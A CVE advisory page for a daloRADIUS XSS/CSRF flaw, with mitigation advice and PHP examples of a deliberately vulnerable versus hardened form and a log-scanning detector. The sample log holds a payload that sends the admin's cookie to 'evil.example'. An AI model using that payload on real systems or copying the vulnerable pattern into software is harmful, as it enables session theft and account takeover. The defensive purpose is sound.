CVE-2022-23475: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in lirantal daloradius
daloRADIUS is an open source RADIUS web management application. daloRADIUS 1.3 and prior are vulnerable to a combined cross-site scripting (XSS) and cross-site request forgery (CSRF) vulnerability in the mng-del.php file, caused by an unescaped variable reflected into the DOM on line 116, which leads to account takeover. This issue has been addressed in commit `ec3b4a419e`. Users are advised to manually apply the commit in order to mitigate this issue. Users may also mitigate this issue in two parts: 1) the CSRF vulnerability can be mitigated by setting the daloRADIUS session cookie to SameSite=Lax or by implementing a CSRF token in all forms; 2) the XSS vulnerability may be mitigated by escaping the reflected variable or by introducing a Content Security Policy.
AI Analysis
Technical Summary
CVE-2022-23475 affects daloRADIUS, an open-source web management application for RADIUS servers, in version 1.3 and earlier. It combines a reflected cross-site scripting (XSS) flaw and a cross-site request forgery (CSRF) weakness in mng-del.php, the management page used to delete user accounts. The root cause is a request-derived variable written into the page unescaped at line 116 of that file, so a crafted link or form causes attacker-supplied JavaScript to execute in the browser of the authenticated administrator who follows it. Because the form carries no anti-CSRF token and the session cookie is not restricted with the SameSite attribute, the attacker can also make the victim's browser submit state-changing requests to the application, with the victim's session cookie attached, without the victim intending to. Chained, the two weaknesses let the attacker act with the victim's privileges, which the advisory summarizes as account takeover. The fix is commit ec3b4a419e, which users are advised to apply manually since no later release was available at the time of the advisory. As interim mitigations the advisory lists setting the session cookie to SameSite=Lax or adding CSRF tokens to all forms (for the CSRF part), and escaping the reflected variable or deploying a Content Security Policy (for the XSS part). No exploitation in the wild is reported, but a chain that ends in account takeover of the RADIUS administration interface is a significant risk on unpatched installations.
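The reflection-without-escaping and missing-token pattern the summary describes, shown beside a hardened version. This is an added illustration written for this page, not code from daloRADIUS or from commit ec3b4a419e; the page layout, the `username` parameter name, the helper names and the CLI demo are all assumptions. It needs PHP 7.3 or later for the array form of `session_set_cookie_params()`.

```php
<?php
// Added example (not daloRADIUS code): a minimal "delete user" page that
// reflects a request parameter unescaped and accepts the POST without a
// token, next to the hardened equivalent. Names are assumptions.
declare(strict_types=1);

// --- CSRF token helpers (per-session random token, constant-time compare) ---
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(?string $submitted): bool {
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// --- Output escaping: ENT_QUOTES so single-quoted attributes are safe too ---
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// --- Vulnerable pattern (the shape the advisory describes) ---
function render_delete_vulnerable(array $req): string {
    $user = (string)($req['username'] ?? '');
    // No CSRF check, and $user is written into the page verbatim, so
    // ?username=<script>...</script> runs in the administrator's browser.
    return "<form method='post'>"
         . "<p>Delete user: $user</p>"
         . "<input type='hidden' name='username' value='$user'>"
         . "<input type='submit' value='Delete'></form>";
}

// --- Hardened pattern: token checked on POST, every reflected value escaped ---
function render_delete_hardened(array $req, string $method): string {
    $user = (string)($req['username'] ?? '');
    if ($method === 'POST') {
        if (!csrf_check($req['csrf_token'] ?? null)) {
            http_response_code(403);
            return '<p>Request rejected: invalid CSRF token.</p>';
        }
        // The actual deletion would happen here, and only on a valid POST.
    }
    return "<form method='post'>"
         . "<input type='hidden' name='csrf_token' value='" . h(csrf_token()) . "'>"
         . "<p>Delete user: " . h($user) . "</p>"
         . "<input type='hidden' name='username' value='" . h($user) . "'>"
         . "<input type='submit' value='Delete'></form>";
}

// --- Session cookie hardening; call before session_start() ---
// SameSite=Lax withholds the cookie on cross-site POSTs and sub-resource
// requests but still sends it on top-level GET navigations, so the page
// must not perform the deletion on GET for this to help.
function harden_session_cookie(): void {
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Demo with a constructed payload; runs from the CLI without a web server.
if (PHP_SAPI === 'cli') {
    $_SESSION = [];
    $payload = ['username' => "<script>alert(document.cookie)</script>"];
    echo "vulnerable: ", render_delete_vulnerable($payload), "\n\n";
    echo "hardened:   ", render_delete_hardened($payload, 'GET'), "\n\n";
    // A forged cross-site POST arrives without the session's token and is refused.
    echo "forged:     ", render_delete_hardened($payload, 'POST'), "\n";
}
```

Two points the contrast makes visible: escaping is applied at output time to each reflected value (not by "sanitizing" the input once), and the CSRF token and the SameSite cookie are complementary, because the token protects the form regardless of how the browser handles cookies, while SameSite does nothing against the XSS itself, which already runs same-origin.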
Potential Impact
For European organizations using daloRADIUS to manage RADIUS servers, this vulnerability poses a moderate to high risk. Successful exploitation gives the attacker the privileges of the administrator whose browser ran the payload, which can be used to manipulate authentication and authorization settings, disrupt network access control, or read the user credentials the application manages. Because RADIUS is a central component of enterprise network authentication, especially in telecommunications, finance and government, this can translate into unauthorized network access, data breaches or service disruptions. The XSS and CSRF components reinforce each other: a malicious link or page delivered through social engineering is enough to trigger the chain, and no credentials need to be stolen in advance. No exploitation in the wild is reported, which suggests limited current activity but does not reduce the impact if the flaw is exploited. Installations whose management interface is reachable from outside the network are at higher risk. Exploitation requires an authenticated administrator to interact with attacker-controlled content (for example, by clicking a link), which limits automated mass exploitation but leaves the flaw well suited to targeted attacks.
Mitigation Recommendations
1. Apply commit ec3b4a419e, manually if no release containing it is available for your installation, to fix the vulnerability at the source code level.
2. Configure the daloRADIUS session cookie with the SameSite=Lax attribute so the browser withholds it on cross-site POSTs and embedded requests. Note that Lax still sends the cookie on top-level GET navigations, so this only helps if mng-del.php does not perform the deletion on GET, and it does nothing against the XSS component, which runs same-origin.
3. Implement anti-CSRF tokens in all forms: a random per-session value embedded in each form and compared server-side with a constant-time comparison before any state change.
4. Escape every user-supplied value at the point where it is written into HTML (htmlspecialchars with ENT_QUOTES for attribute and text contexts) rather than relying on input filtering alone.
5. Deploy a Content Security Policy that blocks inline scripts (nonce- or hash-based script-src without 'unsafe-inline') and limits script sources to trusted origins; a policy that still permits inline scripts will not stop the injected payload.
6. Restrict access to the daloRADIUS management interface with IP allow-listing or VPN-only access to reduce exposure.
7. Conduct regular security audits and penetration testing focused on web application vulnerabilities.
8. Educate administrators about phishing and social engineering risks, since the chain begins with a malicious link or page opened in an authenticated session.
9. Monitor web server logs for requests to mng-del.php whose query string contains script markers (URL-encoded angle brackets, `script`, event-handler attributes) and for requests to that page carrying a Referer from another origin, both of which may indicate exploitation attempts.
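A small log triage script for the last recommendation, as an added example written for this page (not part of the advisory or of daloRADIUS). It assumes the Apache "combined" log format, that daloRADIUS is served under `/daloradius/`, and a trusted hostname of `radius-admin.example.internal`; the sample log lines are constructed, not real traffic. It uses `str_contains`, so it needs PHP 8.

```php
<?php
// Added example (not daloRADIUS code): flag access-log entries for
// mng-del.php that carry script markers or a cross-site Referer.
declare(strict_types=1);

const TARGET_SCRIPT = 'mng-del.php';                    // assumed target page
const TRUSTED_HOST  = 'radius-admin.example.internal';  // assumed admin hostname

// Apache "combined" log format.
const LOG_RE = '/^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<uri>\S+) [^"]*" (?<status>\d{3}) \S+ "(?<referer>[^"]*)" "(?<ua>[^"]*)"$/';

// Markers checked after URL-decoding, so %3Cscript%3E is caught as well.
const XSS_MARKERS = ['<script', 'javascript:', 'onerror=', 'onload=', 'document.cookie'];

function parse_line(string $line): ?array {
    return preg_match(LOG_RE, $line, $m) ? $m : null;
}

function looks_like_xss(string $uri): bool {
    $decoded = strtolower(rawurldecode($uri));
    foreach (XSS_MARKERS as $marker) {
        if (str_contains($decoded, $marker)) {
            return true;
        }
    }
    return false;
}

// A Referer from another origin on a request to the vulnerable page is what
// a CSRF- or XSS-lure-launched request looks like in the access log.
function is_cross_site(string $referer): bool {
    if ($referer === '' || $referer === '-') {
        return false; // a missing Referer is ambiguous and not flagged on its own
    }
    $host = parse_url($referer, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, TRUSTED_HOST) !== 0;
}

// Returns one entry per flagged line: line number, client IP, method, reasons.
function scan_log(array $lines): array {
    $hits = [];
    foreach ($lines as $n => $line) {
        $e = parse_line($line);
        if ($e === null || !str_contains($e['uri'], TARGET_SCRIPT)) {
            continue;
        }
        $reasons = [];
        if (looks_like_xss($e['uri']))    { $reasons[] = 'script markers in URI'; }
        if (is_cross_site($e['referer'])) { $reasons[] = 'cross-site referer'; }
        if ($reasons !== []) {
            $hits[] = ['line' => $n + 1, 'ip' => $e['ip'], 'method' => $e['method'], 'reasons' => $reasons];
        }
    }
    return $hits;
}

// Constructed sample lines (not real traffic).
const SAMPLE_LOG = [
    '10.0.0.5 - - [01/Dec/2022:10:00:01 +0000] "GET /daloradius/mng-del.php?username=alice HTTP/1.1" 200 512 "https://radius-admin.example.internal/mng-list-all.php" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Dec/2022:10:00:07 +0000] "GET /daloradius/mng-del.php?username=%3Cscript%3Efetch(%27//evil.example/%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 610 "https://evil.example/lure.html" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Dec/2022:10:00:12 +0000] "POST /daloradius/mng-del.php HTTP/1.1" 302 0 "https://evil.example/lure.html" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Dec/2022:10:00:20 +0000] "GET /daloradius/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

if (PHP_SAPI === 'cli') {
    foreach (scan_log(SAMPLE_LOG) as $hit) {
        printf("line %d: %s %s from %s (%s)\n",
            $hit['line'], $hit['method'], TARGET_SCRIPT, $hit['ip'], implode(', ', $hit['reasons']));
    }
}
```

On the sample data the first line (a legitimate same-origin delete) is not flagged, the second is flagged for both reasons, the third for its cross-site Referer only, and the fourth is ignored because it does not touch mng-del.php. Keep the limits in mind: payloads submitted in a POST body never appear in the access log, browsers may strip the Referer, and the marker list is a starting point rather than a complete XSS signature, so treat hits as leads for review rather than as confirmed compromise.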
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden, Belgium, Austria
Technical Details
- Data Version: 5.1
- Assigner Short Name: GitHub_M
- Date Reserved: 2022-01-19T21:23:53.758Z
- CISA Enriched: true
Threat ID: 682d9849c4522896dcbf6e0e
Added to database: 5/21/2025, 9:09:29 AM
Last enriched: 6/21/2025, 8:24:30 PM
Last updated: 7/31/2025, 4:44:20 AM